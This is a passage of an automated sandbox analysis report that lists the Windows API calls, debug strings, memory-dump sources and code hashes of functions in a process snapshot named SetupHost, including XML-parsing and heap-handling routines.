                                                                                                                                                                                                                • ::BUCL::Rtl::Add<SIZE_T>( *pcElements, 10, NewCapacity), xrefs: 009C97D1
                                                                                                                                                                                                                • C, xrefs: 009C963D
                                                                                                                                                                                                                • MicrodomImplementation::CMicrodom::FindObject, xrefs: 009C9636
                                                                                                                                                                                                                • onecore\base\xml\udom_microdom.cpp, xrefs: 009C962B, 009C97DC
                                                                                                                                                                                                                • TempElements.Allocate(NewCapacity), xrefs: 009C96D7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeHeapPrintRaiseStatusmemcpy
                                                                                                                                                                                                                • String ID: ::BUCL::Rtl::Add<SIZE_T>( *pcElements, 10, NewCapacity)$C$MicrodomImplementation::CMicrodom::FindObject$MicrodomImplementation::CMicrodom::GetElementsByTagNameCommon$ObjectHeader->uElementType == ucObjectType$TempElements.Allocate(NewCapacity)$onecore\base\xml\udom_microdom.cpp
                                                                                                                                                                                                                • API String ID: 2514639472-2674417421
                                                                                                                                                                                                                • Opcode ID: 0143555df3dd33f69009239c3864dca325d8967d22b96c71509ed60f0b809572
                                                                                                                                                                                                                • Instruction ID: 8a69697e28bb8178b5c13e95d5e7fd4ebcd5c982cd0682157defddb97eefd4ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0143555df3dd33f69009239c3864dca325d8967d22b96c71509ed60f0b809572
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64716775E002199FCF15CF98C888FAEBBB9AF88304F14815DE815AB351D775AD01CBA2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00A0C290
                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00A0C2AA
                                                                                                                                                                                                                  • Part of subcall function 00A0BB7D: GetProcessHeap.KERNEL32(00000000,00000010,00000000,00000000,?,00A0C1A2,?,?,00000000,?,?,?,?,?,00A0C0AE,00000000), ref: 00A0BB8B
                                                                                                                                                                                                                  • Part of subcall function 00A0BB7D: HeapAlloc.KERNEL32(00000000,?,?,?,?,00A0C0AE,00000000,00000000,?,00000000,00000000,00000000,00000001,00000001,00000000,00000000), ref: 00A0BB92
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00A09637,00000000,?,?,00000000), ref: 00A0C331
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A0C338
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process_wcsicmp$AllocFree
                                                                                                                                                                                                                • String ID: false$null$true
                                                                                                                                                                                                                • API String ID: 2655604116-2913297407
                                                                                                                                                                                                                • Opcode ID: 8bd2091610b726ba4f38bdff82cf2d48600954ff6a5c13a1cf9585ef608f4962
                                                                                                                                                                                                                • Instruction ID: 0f113d1bdfcec7a4d080d863df91d435899695bc8318b3a3c6a2f08621879602
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8bd2091610b726ba4f38bdff82cf2d48600954ff6a5c13a1cf9585ef608f4962
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6351B3329183199BC724EBA4F59156FB7E4AF88770F108B2EF855972D0EB30D9048797
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00001BEC,?,?,00000000), ref: 009D65F6
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009D65FD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CMicrodomBuilder::Initialize, xrefs: 009D669B
                                                                                                                                                                                                                • MicrodomImplementation::CreateBinaryMicrodomFromXml, xrefs: 009D663E
                                                                                                                                                                                                                • m_AttdefListTable.Initialize(), xrefs: 009D66A9
                                                                                                                                                                                                                • RtlIsLBlobValid(BinaryData), xrefs: 009D65E6
                                                                                                                                                                                                                • onecore\base\xml\udom_builder.cpp, xrefs: 009D6645, 009D6694
                                                                                                                                                                                                                • Locals.Allocate(), xrefs: 009D6633
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                • String ID: CMicrodomBuilder::Initialize$Locals.Allocate()$MicrodomImplementation::CreateBinaryMicrodomFromXml$RtlIsLBlobValid(BinaryData)$m_AttdefListTable.Initialize()$onecore\base\xml\udom_builder.cpp
                                                                                                                                                                                                                • API String ID: 1617791916-800441761
                                                                                                                                                                                                                • Opcode ID: 6c3e7cf0295d0d585950eba61c3de0b43d8604ef8cca3e38c1428574cd7de048
                                                                                                                                                                                                                • Instruction ID: cc8905ec89d3ca4dda72c1cdc9f353a3c060870231b8635a309f82bb399ac208
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c3e7cf0295d0d585950eba61c3de0b43d8604ef8cca3e38c1428574cd7de048
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6518B7294071D9BDF11DFA4C844BEEBBF9AF88308F11881AE815B7340DB71AA05CB61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000400,00000000,009E68B9,00000000,00000000,00000000,?,009FD25E,00000000,00000000,?,?,009E67CE,?,?), ref: 009FD2E8
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009FD25E,00000000,00000000,?,?,009E67CE,?,?,?), ref: 009FD2EF
                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090310,00000000,00000000,00000000,00000400,00000000,00000000), ref: 009FD310
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009FD25E,00000000,00000000,?,?,009E67CE,?,?,?), ref: 009FD31A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009FD25E,00000000,00000000,?,?,009E67CE,?,?,?), ref: 009FD337
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009FD25E), ref: 009FD33E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009FD25E,00000000,00000000,?,?,009E67CE,?,?,?), ref: 009FD453
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009FD25E), ref: 009FD45A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$AllocControlDeviceErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1143500657-0
                                                                                                                                                                                                                • Opcode ID: c0b9fae49bd0a804b8572bb9ce78201b22fc31356896828c0a4e0392e329f47e
                                                                                                                                                                                                                • Instruction ID: 715f9e9a62fac2748558a422279bf360c6048bebcc9d59fe63992ca9a1ede55d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0b9fae49bd0a804b8572bb9ce78201b22fc31356896828c0a4e0392e329f47e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8951C071602319DFDB188F54C849B7AB7AAFF46315F248069EE058F2A4D3B1EC41CB92
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 009BA259
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 009BA260
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009BA285
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 009BA2AE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 009BA2D6
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BA2DD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 009BA308
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BA30F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$AllocLibrarymemcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2631027701-0
                                                                                                                                                                                                                • Opcode ID: 2fbfd50da34bed8dd8f02369efe54b0573ff2a31ab0961c421df11db0fd16e29
                                                                                                                                                                                                                • Instruction ID: 28b94b9651859ec1b12fa553470de58a4a544b946fafe5800741508312ef0f36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fbfd50da34bed8dd8f02369efe54b0573ff2a31ab0961c421df11db0fd16e29
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3941B172E00216EFCB11DFE5CA84AEDFBB9BF88320F148569E525D7240D7359942CB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,00A124A8,00000030,009DDF5C,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E54EA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E5516
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E551D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000006,00A124A8,00000030,009DDF5C,00000000,00000000,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E55AD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CriticalEnterErrorFreeLastProcessSection
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 69026998-0
                                                                                                                                                                                                                • Opcode ID: 9455c87b3a1c7cce09b8444680d858b09e3600d131ce50f7b821f6fc0e15389f
                                                                                                                                                                                                                • Instruction ID: f437ea0755d25e1c420f1bc82e0cafc712785173f197400905474bf2ae2498b6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9455c87b3a1c7cce09b8444680d858b09e3600d131ce50f7b821f6fc0e15389f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D31C231E04A44ABDB12EFE5E9857AD77BAAF84B25F214529F511DB290DF30CD02CB40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 009E44C1
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009E44C8
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E44F2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,failed,00000000,LoadIntegrityInfo,00000091), ref: 009E4530
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E4537
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000001,00000000,00000000,failed,00000000,LoadIntegrityInfo,00000091), ref: 009E4542
                                                                                                                                                                                                                  • Part of subcall function 009E43A1: GetLastError.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,?,?,?,?,00000000,00000000,00000000), ref: 009E4421
                                                                                                                                                                                                                  • Part of subcall function 009E43A1: SetLastError.KERNEL32(0000000D,00000000,00000001,00000000,?,?,?,?,00000000,00000000,00000000), ref: 009E444C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLast$Process$AllocFree
                                                                                                                                                                                                                • String ID: LoadIntegrityInfo$failed
                                                                                                                                                                                                                • API String ID: 506812622-3343604124
                                                                                                                                                                                                                • Opcode ID: 2cfd7f41e455f4a93aa5a60829e8c277c5744f3e2ec2b6be25f679e26cf6258a
                                                                                                                                                                                                                • Instruction ID: 16b6329c7135f65b0618b97c8cbcdb2f800a359921c6c70b57b755fbe17b0b04
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cfd7f41e455f4a93aa5a60829e8c277c5744f3e2ec2b6be25f679e26cf6258a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49212B75B04351ABDB139BA69C49BFE766DBF94B11F188078F906EB281CF75CC028690
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BFAF5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BFAFC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000001), ref: 009BFB08
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009BFB0F
                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000000,00000080,?), ref: 009BFB29
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,00000000,00000080,?), ref: 009BFB48
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BFB6B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BFB72
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreePrivateProfile$AllocSectionString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1072484906-0
                                                                                                                                                                                                                • Opcode ID: bc063f7e239606b5f8aff0f33b0b6054aa39b845f2456b45250f6263afddd4b2
                                                                                                                                                                                                                • Instruction ID: aa5ce3f2d73fd7719a6a06a2f635ba208d1b7b1f35cc3aadb902f4618808368c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc063f7e239606b5f8aff0f33b0b6054aa39b845f2456b45250f6263afddd4b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20217F71A01225ABCF109FE9DD68EEF7ABCEF487A1F048139F909D6150D6348901CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057), ref: 009BD6DC
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE660
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE676
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6C3
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6DB
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 009BD66E
                                                                                                                                                                                                                  • Part of subcall function 009BDD47: CreateFileW.KERNEL32(00000000,00010180,-00000007,00000000,00000003,02200000,00000000), ref: 009BDDB4
                                                                                                                                                                                                                  • Part of subcall function 009BDD47: memset.MSVCRT ref: 009BDDCF
                                                                                                                                                                                                                  • Part of subcall function 009BDD47: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BDE3D
                                                                                                                                                                                                                  • Part of subcall function 009BDD47: HeapFree.KERNEL32(00000000), ref: 009BDE44
                                                                                                                                                                                                                  • Part of subcall function 009BDD47: CloseHandle.KERNEL32(?), ref: 009BE15D
                                                                                                                                                                                                                  • Part of subcall function 009BDD47: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BE1B5
                                                                                                                                                                                                                  • Part of subcall function 009BDD47: HeapFree.KERNEL32(00000000), ref: 009BE1BC
                                                                                                                                                                                                                  • Part of subcall function 009BDD47: SetLastError.KERNEL32(00000000,00000000,00000000,00000000), ref: 009BE1C3
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 009BD69C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BD6AC
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BD6B3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009BD6C0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BD6C7
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009BD6D0
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE769
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE77F
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE7AA
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE7E7
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: HeapFree.KERNEL32(00000000), ref: 009BE7EE
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: SetLastError.KERNEL32(?,?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE7F8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLast$FreeProcess$_wcsnicmp$File$AttributesCloseCreateHandlememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3123238892-0
                                                                                                                                                                                                                • Opcode ID: 3f7baee46f39c660fa93092664cd91a026006f4890aa16facf97093ab0bc8c7b
                                                                                                                                                                                                                • Instruction ID: a848e40e986f7f88e480427646d07864f5151b8da670f2036a4eb90667ef5d36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f7baee46f39c660fa93092664cd91a026006f4890aa16facf97093ab0bc8c7b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD112631606300EBDB109BB59E0DBEF3B39AFC8771F148128F80986160EB74CC0296A4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,?,?,00000000,009ED737,?,?,00000000,?,?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0), ref: 009E0285
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0,00000000,00000000,?,009E6A3B,?,?,?,?,00000000), ref: 009E028C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0,00000000,00000000,?,009E6A3B,?,?,?,?,00000000,00000000), ref: 009E0298
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0,00000000,00000000,?,009E6A3B,?,?,?,?,00000000,00000000), ref: 009E02B0
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009E02D9
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0,00000000,00000000,?,009E6A3B,?,?,?,?,00000000), ref: 009E02E3
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0,00000000,00000000,?,009E6A3B,?,?,?,?,00000000), ref: 009E02F3
                                                                                                                                                                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,009ED6AA,?,009ED0B0,009ECFA0,Function_0006CEF0,00000000,00000000,?,009E6A3B,?), ref: 009E0306
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalErrorHeapLastSection$AllocEnterLeaveObjectProcessReleaseSemaphoreSingleWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 549668083-0
                                                                                                                                                                                                                • Opcode ID: ebc0e9b2d38363e723de14887f8501a3b3fa055b06c6dca38308d014ae9badb3
                                                                                                                                                                                                                • Instruction ID: 2e936d98161151401c540a43271131277ab504bf8d917c6c1c8790e4454cca47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebc0e9b2d38363e723de14887f8501a3b3fa055b06c6dca38308d014ae9badb3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C911C271205251DBD7129FA6DC4CBAA7AB8FF85311F109155F911DA2A9C7B4CC82CB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • RtlIsLBlobValid(Source), xrefs: 009DB577
                                                                                                                                                                                                                • onecore\base\lstring\lblob.cpp, xrefs: 009DB5BB
                                                                                                                                                                                                                • Not-null check failed: Source, xrefs: 009DB53D
                                                                                                                                                                                                                • (DestinationMaximumLength == 0) || (DestinationBuffer != 0), xrefs: 009DB559
                                                                                                                                                                                                                • RtlCopyLBlob, xrefs: 009DB5C6
                                                                                                                                                                                                                • Not-null check failed: Destination, xrefs: 009DB5AF
                                                                                                                                                                                                                • DestinationMaximumLength >= SourceLength, xrefs: 009DB58C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
